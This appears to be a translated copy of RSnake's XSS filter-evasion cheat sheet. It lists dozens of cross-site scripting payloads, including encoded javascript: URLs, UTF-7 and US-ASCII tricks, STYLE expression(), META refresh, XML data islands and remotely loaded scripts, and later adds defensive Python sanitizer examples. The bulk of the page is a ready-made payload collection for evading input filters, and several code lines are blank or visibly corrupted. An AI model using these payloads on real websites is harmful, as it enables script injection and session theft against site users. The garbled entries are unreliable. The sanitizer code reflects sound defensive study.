Translation: XSS Filter Bypass

Source: Internet
Author: User

If you do not already know how to perform XSS attacks, this article will not help you much. It is aimed at readers who understand basic XSS and want a deeper understanding of the details of bypassing filters. It does not explain how to reduce the impact of XSS or how to write actual attack code; the basic methods given here are enough to work out the rest.
(The introduction and the basics section are omitted, and the sin is expected to include a large number of RSnake adults)

Case-insensitive XSS
Code:

HTML entities
Code:

Grave accent obfuscation (if you need both single and double quotation marks, you can use grave accents to enclose the JavaScript string; many filters do not know about grave accents, which is what makes this vector work)
Code:

Malformed IMG tags. Originally discovered by Begeek (and shortened so that it works in all browsers), this vector relies on the lax rendering engine to let us build our own XSS inside an IMG tag that should be enclosed in quotation marks.
Code: <SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode: if no quotation marks are allowed at all, you can eval() a fromCharCode string instead.
Code:

UTF-8 encoding
Code:

Long UTF-8 encoding without semicolons can bypass some regular-expression checks
Code:

Hex encoding without semicolons
Code:

Embedded TAB character
Code:

Embedded encoded TAB character
Code:

Embedded newlines also allow XSS. Some websites claim that characters 09 through 13 can be used for XSS; this is incorrect. Only 09, 10 and 13 work.
Code:
Code:
Code:
SRC
=
"
J
A
V
A
S
C
R
I
P
T
:
A
L
E
R
T
(
'
X
S
S
'
)
"
>

NULL characters get past many filtering systems
Code: perl -e 'print '';' > out
Code: perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
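The sections above (case changes, decimal/hex/long entities with and without semicolons, embedded TAB, newline, carriage return and NUL) all defeat the same kind of filter: one that looks for the literal string "javascript:" before the browser has decoded the attribute value. The following Python is an added example, not part of the original article; it folds an attribute value the way a browser does before reading the scheme, using only the standard library (html.unescape handles the numeric references, including the padded and semicolon-less forms). The sample values are constructed here to match the obfuscations described above.

```python
import html
import re

# Control characters that a browser's URL parser drops before it reads the
# scheme: NUL plus the three "09 10 13" characters named in the text above.
_IGNORED = re.compile(r"[\x00\t\n\r]")

def normalize_url(value: str) -> str:
    """Fold an attribute value the way a browser does before it looks at the
    scheme: decode HTML character references (decimal, hex, zero-padded, with
    or without the trailing semicolon), drop the ignored control characters,
    then trim and lower-case."""
    decoded = html.unescape(value)
    return _IGNORED.sub("", decoded).strip().lower()

def naive_is_script_url(value: str) -> bool:
    """The check the vectors above defeat: a case-sensitive substring match on
    the raw, undecoded value."""
    return "javascript:" in value

def is_script_url(value: str) -> bool:
    """The same question asked of the normalized value."""
    return normalize_url(value).startswith("javascript:")

def encode_for_attribute(value: str) -> str:
    """Output-side fix that does not depend on spotting the scheme at all:
    entity-encode the value so it can only ever be attribute text."""
    return html.escape(value, quote=True)

# Constructed attribute values, one per obfuscation described in the text above.
SAMPLES = {
    "plain": "javascript:alert('XSS')",
    "mixed-case": "JaVaScRiPt:alert('XSS')",
    "decimal-entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "long-no-semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                         "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "hex-no-semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "embedded-tab": "jav\tascript:alert('XSS')",
    "embedded-newline": "jav\nascript:alert('XSS')",
    "embedded-null": "java\x00script:alert('XSS')",
    "benign": "https://example.com/page",
}

def compare(samples=SAMPLES):
    """Return {name: (naive verdict, normalized verdict)} for every sample."""
    return {name: (naive_is_script_url(v), is_script_url(v)) for name, v in samples.items()}

if __name__ == "__main__":
    for name, (naive, normalized) in compare().items():
        print(f"{name:18} naive={naive!s:5} normalized={normalized}")
```

Running it shows the naive check catching only the plain sample while the normalized check flags every obfuscated form and still passes the benign URL. The durable defence is the last function: encoding on output means the filter does not have to win every decoding race.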

Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector can defeat detection engines that first match opening and closing angle brackets and then compare the tag between them, instead of using a more efficient algorithm such as Boyer-Moore that searches the whole string for the opening angle bracket and its associated tag (after de-obfuscation, of course). The double slash comments out the trailing extra bracket to suppress a JavaScript error:
Code: <<SCRIPT>alert("XSS");//<</SCRIPT>

Unclosed tags
Code: <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

Unclosed IMG or IFRAME tags
Code:

XSS without single quotes
Code: <SCRIPT>alert(/XSS/.source)</SCRIPT>

Various other tags
Code: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Code: <BODY BACKGROUND="javascript:alert('XSS')">
Code: <BODY ONLOAD=alert('XSS')>
Code:
Code: <BGSOUND SRC="javascript:alert('XSS');">
Code: <BR SIZE="&{alert('XSS')}"> (Netscape)
Code: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code: <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Code: <META HTTP-EQUIV="Link" Content="
Code: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xss#.xml#xss")}</STYLE>
Code: <XSS STYLE="behavior: url(xss.htc);">
Code: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
Code: (Netscape only)
Code: (Netscape only)
Code: <TABLE BACKGROUND="javascript:alert('XSS')">
Code: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Code: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
Code: <DIV STYLE="background-image: url(javascript:alert('XSS'))">
Code: <BASE HREF="javascript:alert('XSS');//">
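The list above makes the case against blocklists: script can ride on INPUT, BODY, BGSOUND, LINK, STYLE, META, TABLE, TD, DIV, IFRAME and BASE, through SRC, HREF, BACKGROUND, STYLE and event attributes alike, and later sections add OBJECT, EMBED, XML islands and HTC behaviors. The practical defence is an allowlist sanitizer that rebuilds the document from a short list of permitted tags and attributes and throws everything else away. The following Python is an added example written for this article, not code from the original; it uses the standard-library html.parser, and the tag and attribute allowlists, the DROP_WITH_CONTENT set and the SAMPLE fragment are all choices made here for illustration.

```python
import html
import re
from html.parser import HTMLParser
from typing import Optional

# Allowlist. STYLE, META, LINK, BASE, OBJECT, EMBED, IFRAME, BGSOUND, XML and
# the other tags listed above are simply absent from it, so they need no rule.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "ul", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
# Elements whose text content is discarded together with the tag.
DROP_WITH_CONTENT = {"script", "style", "object", "embed", "iframe", "xml"}
_CTRL = re.compile(r"[\x00-\x20]")

def safe_url(value: str) -> Optional[str]:
    """Allow only absolute http(s) URLs, judged after removing the control
    characters (NUL, tab, newline, ...) that the URL parser ignores, so
    "jav<TAB>ascript:" is seen the way the browser would see it."""
    folded = _CTRL.sub("", value).lower()
    return value if folded.startswith(("http://", "https://")) else None

class Sanitizer(HTMLParser):
    """Rebuilds the document from the allowlist; everything else is dropped."""

    def __init__(self):
        # convert_charrefs=True: text and attribute values arrive decoded,
        # so entity-obfuscated schemes are already unfolded here.
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # >0 while inside an element from DROP_WITH_CONTENT

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return  # unknown tag: strip the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # style, background, on*, dynsrc, datasrc ... all end here
            value = value or ""
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))
    # Comments, <!DOCTYPE>, <![CDATA[ sections and <?import ...> PIs fall
    # through to the base-class handlers, which emit nothing.

def sanitize(fragment: str) -> str:
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

# Constructed fragment mixing benign markup with vectors from the list above.
SAMPLE = (
    '<p>Hello <b onmouseover="alert(1)">world</b></p>'
    '<a href="jav&#x09;ascript:alert(\'XSS\')">link</a>'
    '<a href="https://example.com/">ok</a>'
    '<IMG SRC="javascript:alert(\'XSS\')">'
    '<img src="https://example.com/a.png" alt="pic">'
    '<STYLE>@import\'http://example.invalid/xss.css\';</STYLE>'
    '<DIV STYLE="width: expression(alert(\'XSS\'))">text</DIV>'
    '<script>alert("XSS")</script>'
)

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

The design point is that nothing in the sanitizer names "javascript:" or any particular tag from the list: a URL attribute survives only if, after folding, it starts with http:// or https://, and a tag or attribute survives only if it is explicitly permitted. New vectors built from tags or attributes the author had not heard of are dropped by default rather than slipping through.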

US-ASCII encoding (found by bolt). Using 7-bit ASCII encoding instead of 8-bit can bypass many filters, but the server must interact in US-ASCII for this to work; at present only Apache Tomcat does so.
Code: ¼script¾alert(¢XSS¢)¼/script¾

META protocol
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

Unicode encoding inside a DIV style
Code: <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Using the expression() property
Code: <DIV STYLE="width: expression(alert('XSS'));">

STYLE tag
Code: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Code: <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Code: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
Code: <STYLE TYPE="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

OBJECT tag
Code: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

EMBED tag
Code: <EMBED SRC="http://www.bkjia.com/xss.swf" AllowScriptAccess="always"></EMBED>
Code: <EMBED SRC="data:image/svg+xml;base64,zookeeper zookeeper+YWxlcnQoIlh tuyipozwvc2nyaxb0p1_vc3znpg=" TYPE="image/svg+xml" AllowScriptAccess="always"></EMBED>
Use the following ActionScript in a Flash file:
Code: a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

An XML namespace can import an HTC behavior file, but it must be on the same server
Code: <HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
xss.htc: <PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>

XML data island obfuscated with CDATA
Code: <XML ID=I><X><C><![CDATA[<![CDATA[cript:alert('XSS');">]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

XML data island
Code: <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

Code: <XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
(xsstest.xml must be in the same domain)

HTML+TIME
Code: <HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

UTF-7 encoding
Code: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
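The US-ASCII vector earlier on this page and the UTF-7 vector just above share one root cause: the filter inspects the bytes under one character encoding while the client interprets them under another, so "¼script¾" (0xBC, 0xBE with the high bit dropped) and "+ADw-SCRIPT+AD4-" contain no literal angle bracket until the client decodes them. The following Python is an added example, not part of the original article; it reproduces both decodings with the standard-library codecs so the effect can be seen offline, shows a check applied across candidate encodings, and shows the server-side fix, an explicit charset in the HTTP Content-Type header, which takes precedence over any META declaration in the body. The payload strings are constructed copies of the two on this page.

```python
# Constructed copies of the two page payloads (the US-ASCII one uses
# U+00BC, U+00BE and U+00A2; the UTF-7 one is plain ASCII).
US_ASCII_PAYLOAD = "\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be"
UTF7_PAYLOAD = "+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"

def seven_bit_view(text: str) -> str:
    """What a 7-bit US-ASCII consumer makes of 8-bit Latin-1 input: the high
    bit is discarded, so 0xBC (¼) becomes 0x3C (<), 0xBE (¾) becomes
    0x3E (>) and 0xA2 (¢) becomes 0x22 (double quote)."""
    return bytes(b & 0x7F for b in text.encode("latin-1")).decode("ascii")

def utf7_view(text: str) -> str:
    """What the same bytes mean if the client decodes them as UTF-7, which is
    what the charset=UTF-7 META declaration above asks for."""
    return text.encode("ascii").decode("utf-7")

def naive_has_markup(text: str) -> bool:
    """A filter looking for a literal angle bracket in the bytes it was given."""
    return "<" in text

def charset_aware_has_markup(text: str) -> bool:
    """Apply the same test to every interpretation the client might choose."""
    views = [text]
    try:
        views.append(seven_bit_view(text))
    except UnicodeEncodeError:  # not representable as Latin-1: no 7-bit reading
        pass
    try:
        views.append(utf7_view(text))
    except (UnicodeEncodeError, UnicodeDecodeError):  # not valid UTF-7 input
        pass
    return any("<" in v for v in views)

def response_headers(body: bytes) -> dict:
    """Server-side fix for both vectors: declare the charset explicitly so the
    client never has to guess and in-body META declarations are ignored."""
    return {"Content-Type": "text/html; charset=utf-8",
            "Content-Length": str(len(body))}

if __name__ == "__main__":
    print(seven_bit_view(US_ASCII_PAYLOAD))
    print(utf7_view(UTF7_PAYLOAD))
    for p in (US_ASCII_PAYLOAD, UTF7_PAYLOAD):
        print(naive_has_markup(p), charset_aware_has_markup(p))
```

The multi-encoding check is a stopgap for content that must be filtered on input; pinning the response charset removes the ambiguity the vectors depend on, and output encoding of untrusted text (covered by the earlier example) makes the question of how "<" was spelled irrelevant.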

Preventing the expression statement from being executed more than once
<A STYLE="x:expression(window.r!=1?(window.r=1,eval(x.t)):1)">
<X id=x t="alert(0)">

Author: RSnake
Translation: Emperor shitian
